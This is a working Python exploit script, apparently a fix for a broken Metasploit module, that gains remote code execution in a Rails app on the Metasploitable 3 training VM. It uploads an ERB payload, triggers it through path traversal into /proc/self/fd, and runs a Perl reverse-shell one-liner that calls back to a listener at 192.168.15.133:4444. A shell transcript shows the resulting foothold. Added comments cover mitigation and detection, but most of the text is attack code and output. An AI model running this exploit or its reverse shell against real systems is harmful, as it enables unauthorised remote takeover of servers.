Fix for the broken rails_dynamic_render_code_exec exploit against Metasploitable 3
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Exploit for Metasploitable 3 - render params[:os] 's RCE | |
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick | |
# This exploit slightly adjusts the temporary file extension to an empty string | |
#
# Reviewer notes (defensive context):
# Vulnerability class: a request parameter (params[:os]) reaches Rails'
# `render`, so the application treats an attacker-chosen file path as a view
# template. Combined with a file the requester can place on disk (the
# multipart upload below), ERB inside that file is evaluated server-side.
# Mitigation: never pass request data into `render`; map user input onto a
# fixed allowlist of template names and reject everything else.
# Detection: web-server/Rails logs with `../` sequences or `/proc/self/fd`
# in the `os` parameter; unexpected outbound TCP connections from the app
# process; multipart uploads whose body contains `<%=` tags.
import requests | |
# 1. tmp upload | |
# Lab target: the Metasploitable 3 VM, a deliberately vulnerable training image.
host = "172.28.128.3" | |
# Reverse-shell one-liner the server ends up executing; 192.168.15.133:4444 is
# the listener shown in the session transcript at the bottom of this file.
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" | |
# Hand-built multipart/form-data body; the boundary string in the body must
# match the one declared in the Content-Type header. The single part is an
# ERB tag that backticks `cmd`, so whatever renders this file as a template
# runs the command.
headers = {"Content-Type": "multipart/form-data; boundary=_Part_596_558276832_972275724", "Connection": "close"} | |
payload = "--_Part_596_558276832_972275724\r\nContent-Disposition: form-data; name=\"ggez\"; filename=\"ggez\"\r\n\r\n<%=`"+cmd+"`%>\r\n--_Part_596_558276832_972275724--\r\n" | |
# Upload step: per the header comment above, the server buffers the part to a
# temporary file (with an empty extension) while the request is handled.
requests.post("http://"+host+":3500/", headers=headers, data=payload) | |
# 2. trigger | |
# Path traversal into /proc/self/fd/<N>: presumably fd 7 is the still-open
# upload temp file inside the Rails process, so `render` evaluates its ERB.
# The fd number is environment-specific, which is why the upstream module
# breaks on a slightly different build of the target.
requests.get("http://"+host+":3500/readme/?os=../../../../proc/self/fd/7") | |
# Session transcript (not executed). Hardening note independent of the Rails
# bug: the app runs as `chewbacca`, a member of group 999(docker); docker
# group membership is effectively root-equivalent on the host, so a foothold
# in this process is already a full-host compromise.
''' | |
$ python readme_render_exploit.py | |
$ nc -lvp 4444 | |
listening on [any] 4444 ... | |
192.168.15.1: inverse host lookup failed: Unknown host | |
connect to [192.168.15.133] from (UNKNOWN) [192.168.15.1] 50209 | |
pwd | |
/opt/readme_app | |
id | |
uid=1124(chewbacca) gid=100(users) groups=100(users),999(docker) | |
ls | |
Gemfile | |
Gemfile.lock | |
README.md | |
Rakefile | |
app | |
bin | |
config | |
config.ru | |
db | |
lib | |
log | |
public | |
start.sh | |
test | |
tmp | |
vendor | |
''' |